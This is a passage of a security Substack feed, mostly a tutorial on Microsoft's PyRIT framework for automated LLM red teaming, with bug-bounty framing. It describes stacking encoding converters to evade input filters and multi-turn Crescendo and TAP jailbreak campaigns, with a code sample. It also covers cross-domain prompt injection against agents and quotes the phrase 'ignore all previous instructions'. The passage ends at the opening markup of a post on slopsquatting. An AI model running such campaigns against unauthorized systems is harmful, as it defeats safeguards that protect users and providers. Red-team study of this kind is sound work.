https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> PyRIT is Microsoft&#8217;s open-source AI red team framework, battle-tested on 100+ internal operations. It chains targets, converters, scorers, and orchestrators into automated LLM attack campaigns. Converters stack like payload encoders. Orchestrators run Crescendo and TAP, the multi-turn patterns bounty programs pay out on right now. Here&#8217;s how to wire it up.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why PyRIT Matters for AI Bug Bounty Work</h2><p>Pen testers have Metasploit. Web app hunters have Burp. AI red teaming, until recently, had a guy in a tab retyping &#8220;ignore all previous instructions&#8221; forty different ways and hoping one of them landed.</p><p>PyRIT changes the shape of the work. The Python Risk Identification Tool is Microsoft&#8217;s open-source framework for running structured attack campaigns against LLM systems. Microsoft&#8217;s AI Red Team built it, ran it against more than a hundred internal operations including Phi-3 and Copilot, then open-sourced the whole thing. The repo sits at <a href="https://github.com/microsoft/PyRIT">github.com/microsoft/PyRIT</a> with 3.6k stars as of April 2026, up from 3.4k at the start of the year. It&#8217;s moving fast.</p><p>Here&#8217;s why we care. The Microsoft Security Response Center tied PyRIT directly to their AI bounty program. They&#8217;re telling researchers to use it. Bounty platforms are <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">paying out on automated multi-turn chains</a> against frontier models right now: system prompt leaks, guardrail bypasses, indirect injection through agent tools. The framework chains attack primitives together the same way Metasploit chains exploits, scores every result, and logs every transcript for the bounty write-up.</p><h2>What Are PyRIT&#8217;s Four Core Primitives?</h2><p>Every piece of PyRIT maps to something we already know from offensive tooling. Once the mapping clicks, the rest falls into place.</p><p><strong>Targets are the scope.</strong> A target is whatever we point prompts at: Azure OpenAI, a Hugging Face model, a local Ollama instance, or a custom HTTP endpoint via the HTTPTarget class. Ship-built target classes cover every major provider. HTTPTarget swallows anything that accepts text over a REST API.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zRbF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zRbF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 424w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 848w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1272w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png" width="1137" height="217" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b0f696f5-885d-4492-ad57-f884797c3726_1137x217.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:217,&quot;width&quot;:1137,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:21624,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." srcset="https://substackcdn.com/image/fetch/$s_!zRbF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 424w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 848w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1272w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Converters are payload encoding.</strong> A converter transforms a prompt before it hits the target. </p><ul><li><p>Base64</p></li><li><p>ROT13</p></li><li><p>Leetspeak</p></li><li><p>ASCII art</p></li><li><p>Unicode substitution</p></li><li><p>Translation to a low-resource language</p></li></ul><p>The <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">same encoding evasion tricks</a> we&#8217;ve been hand-stacking against input filters, now programmatic. And converters stack. The output of one feeds the next. Translate to Zulu, then Base64, then wrap in a roleplay frame. Three converters, one pipeline. The model reads us clean. The input filter sees noise.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;1b70cac1-c5b3-4d4e-ac42-80a2f811c12b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">from pyrit.prompt_converter import Base64Converter, TranslationConverter

# Stack converters: Zulu, then Base64
converters = [
    TranslationConverter(converter_target=attack_llm, language="zulu"),
    Base64Converter()
]
</code></pre></div><p><strong>Scorers are the success criteria.</strong> After the target responds, a scorer decides if the attack landed. Binary true/false (&#8221;did it comply?&#8221;), Likert scale (&#8221;how harmful, 1 to 5?&#8221;), refusal detection (&#8221;did it say no?&#8221;), or LLM-as-judge where a separate model grades the response. Hunting for system prompt leaks? <code>SelfAskTrueFalseScorer</code> tuned for instruction disclosure. Testing for harmful content? Use a content classifier. The more specific the description, the cleaner the verdict.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3UY0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3UY0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 424w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 848w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1272w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png" width="1139" height="217" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:217,&quot;width&quot;:1139,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:23293,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." srcset="https://substackcdn.com/image/fetch/$s_!3UY0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 424w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 848w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1272w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Orchestrators are the exploit framework.</strong> They wire targets, converters, and scorers together and drive the flow. <code>PromptSendingOrchestrator</code> is the basic spray: batch single-turn prompts through a converter stack. <code>RedTeamingOrchestrator</code> runs multi-turn conversations where an attacker LLM generates follow-ups from what the target just said. <code>CrescendoOrchestrator</code> escalates gradually across turns. <code>TreeOfAttacksWithPruningOrchestrator</code> explores multiple paths in parallel and prunes dead branches.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qphz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qphz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 424w, https://substackcdn.com/image/fetch/$s_!qphz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 848w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1272w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png" width="1136" height="254" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:254,&quot;width&quot;:1136,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:29105,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." srcset="https://substackcdn.com/image/fetch/$s_!qphz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 424w, https://substackcdn.com/image/fetch/$s_!qphz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 848w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1272w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Under all of this sits a memory layer. SQLite or Azure SQL logs every prompt, every converter transform, every score. Conversation IDs. Timestamps. Raw responses. That&#8217;s our chain of custody when a Crescendo chain lands on turn six and we need to turn it into a clean bounty report.</p><h2>How Do You Run a PyRIT Campaign?</h2><p>Install is clean. Conda env, pip, done.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;4fe4c5a2-317e-437b-931f-3b81d82c30ae&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">conda create -n pyrit python=3.11 -y
conda activate pyrit
pip install pyrit
</code></pre></div><p>PyRIT runs in Jupyter notebooks, which is actually ideal. Interactive execution, inline output, a natural lab book for the campaign. Microsoft ships their entire documentation as runnable notebooks, which is either genius or annoying depending on your mood.</p><p>The simplest campaign is <code>PromptSendingOrchestrator</code>: fire a batch of prompts, apply a converter stack, score every response. Define the target (Azure OpenAI, HTTPTarget, Ollama, whatever), define a scorer with a sharp true/false description, hand it a list of prompts. PyRIT does the rest.</p><p>Think of it as Nmap before the real work. We&#8217;re mapping the surface. Which probes get through. Which get blocked. Where the filters are soft. And the real value shows up the moment we go multi-turn.</p><h2>Crescendo and TAP: Where Multi-Turn Attacks Land</h2><p>Single-turn prompt injection is 2023 energy. Frontier models got good at catching individual malicious prompts. The <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-style one-shot jailbreaks</a> that used to work now trip intent classifiers on contact. Multi-turn attacks still land. The exploit lives in the trajectory across turns, never in one message.</p><p>PyRIT&#8217;s <code>CrescendoOrchestrator</code> automates the boil-the-frog pattern. Start with an innocent question. Reference the model&#8217;s own answer. Shift the frame. By turn six, the guardrails have lost the thread. Per-message safety checks evaluate individual messages in isolation. Crescendo operates on the arc of the conversation, where no single turn looks dangerous.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;cc9b7b44-81a8-4cde-96ad-83364bf4ecba&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">from pyrit.orchestrator import CrescendoOrchestrator

orchestrator = CrescendoOrchestrator(
    objective_target=target,
    adversarial_chat=attack_llm,
    scoring_target=scoring_llm,
    max_turns=10,
    objective="[REDACTED - bounty objective]"
)

result = await orchestrator.run_attack_async(
    objective="[REDACTED]"
)
</code></pre></div><p>An adversarial LLM generates each turn from the target&#8217;s last response. The scoring target evaluates after each exchange. If the objective lands, the campaign stops and logs the winning conversation. If it hits max turns without success, we get the full transcript to analyze manually, which is often where the interesting near-misses hide.</p><p><code>TreeOfAttacksWithPruningOrchestrator</code> (TAP) takes a different shape. Instead of one thread, it explores multiple attack paths in parallel. Branches the scorer rates as progressing get expanded. Dead ends get pruned. Breadth-first search through prompt space, but cheap, because failing branches die fast.</p><p>Both patterns map directly to techniques paying out right now. Microsoft&#8217;s own AI Red Team Playground Labs use PyRIT to automate Crescendo as training exercises. OWASP lists prompt injection as LLM01:2025. The <a href="https://www.toxsec.com/p/ai-kill-chain-explained">NVIDIA AI Kill Chain</a> frames these multi-turn patterns as the hijack stage. The taxonomy is there. The tooling is there. The payouts are there.</p><p>For hunters targeting the <a href="https://www.toxsec.com/p/secure-your-mcp">agent attack surface</a> (indirect injection through tools, markdown exfiltration, MCP poisoning), PyRIT ships <code>XPIAOrchestrator</code> for cross-domain prompt injection attacks that embed malicious instructions in external data sources. Point it at the surface where agents ingest untrusted content and it runs.</p><p>The workflow flips. Instead of testing one bypass at a time in a chat tab, we define ten converter chains, twenty prompts, and let PyRIT score two hundred combinations while we go get coffee. When something scores true, we pull the transcript from memory, write the report, submit.</p><p>PyRIT doesn&#8217;t find vulnerabilities on its own. Same way Metasploit doesn&#8217;t hack anything without an operator who understands the surface. But it compresses hours of manual prompt iteration into minutes of automated campaign runs. For AI bounty work in 2026, that&#8217;s the difference between testing five ideas in a session and testing five hundred.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is PyRIT free to use for bug bounty hunting?</h3><p>PyRIT itself is free and open source under an MIT license. Costs come from the LLMs you wire in: Azure OpenAI credits, OpenAI API tokens, or local compute via Ollama. For bounty work, running a local model as the adversarial and scoring LLM keeps costs near zero. Only the target endpoint burns external credits, and authorized bounty targets are free to hit by definition.</p><h3>Does PyRIT work against AI agents with tool access, not just chatbots?</h3><p>Yes, via <code>XPIAOrchestrator</code> for cross-domain prompt injection that embeds malicious instructions in external data sources. This hits the indirect injection surface where agents process untrusted content from emails, documents, MCP tool returns, or RAG stores. For deeper agent-specific testing, chain PyRIT with custom targets that simulate tool-augmented workflows end to end.</p><h3>How does PyRIT compare to Garak and Promptfoo?</h3><p>Different tools, different strengths. <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">Garak is NVIDIA&#8217;s broad-spectrum vulnerability scanner, closer to Nmap for LLMs</a>. <a href="https://www.toxsec.com/p/promptfoo-red-teaming">Promptfoo is CI/CD-first, built for regression-testing safety layers in a pipeline</a>. PyRIT is the deep, adaptive multi-turn attack engine. Garak sweeps the surface, PyRIT runs the surgical follow-up, Promptfoo keeps patches from regressing. Together, that&#8217;s a full kill chain methodology for LLM red teaming.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[What is Slopsquatting? AI Hallucinations Ship Malware]]></title><description><![CDATA[Attackers pre-register the fake package names AI coding tools invent, then wait for the copy-paste. slopcheck blocks it at the install boundary.]]></description><link>https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations</link><guid isPermaLink="false">https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:30:55 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!7GEu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7GEu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7GEu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:6812334,&quot;alt&quot;:&quot;Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F547a262e-3d0e-4fc1-be66-fe9f89380585_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside" title="Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside" srcset="https://substackcdn.com/image/fetch/$s_!7GEu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div 